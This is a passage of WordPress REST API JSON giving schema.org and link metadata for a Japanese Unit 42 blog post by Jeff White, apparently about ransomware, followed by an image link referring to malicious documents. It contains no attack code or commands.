9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u3092\u89e3\u660e\u3059\u308b"}]},{"@type":"WebSite","@id":"https:\/\/unit42.paloaltonetworks.com\/#website","url":"https:\/\/unit42.paloaltonetworks.com\/","name":"Unit 42","description":"Palo Alto Networks","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/unit42.paloaltonetworks.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"ja"},{"@type":"Person","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/32ecb81b6d2fc5ba9e630880df6a8184","name":"Jeff White","image":{"@type":"ImageObject","inLanguage":"ja","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/image\/9213e49ea48b7676660bac40d05c9e3e","url":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2018\/11\/unit-news-meta.svg","contentUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2018\/11\/unit-news-meta.svg","caption":"Jeff White"},"description":"Principal threat researcher, enterprise R&D, FWaaP, Palo Alto Networks","url":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/author\/jeff-white\/"}]}},"_links":{"self":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts\/106674","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/users\/135"}],"replies":[{"embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/comments?post=106674"}],"version-history":[{"count":5,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts\/106674\/revisions"}],"predecessor-version":[{"id":106679,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts\/106674\/revisions\/106679"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/media\/104006"}],"wp:attachment":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/media?parent=106674"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/categories?post=106674"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/tags?post=106674"},{"taxonomy":"product_categories","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/product_categories?post=106674"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/coauthors?post=106674"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
![\"\u56f31](\"https:\/\/www.paloaltonetworks.jp\/content\/dam\/paloaltonetworks-com\/ja_JP\/Images\/blog\/2017\/Farming%20Malicious%20Documents\/farming1.png\")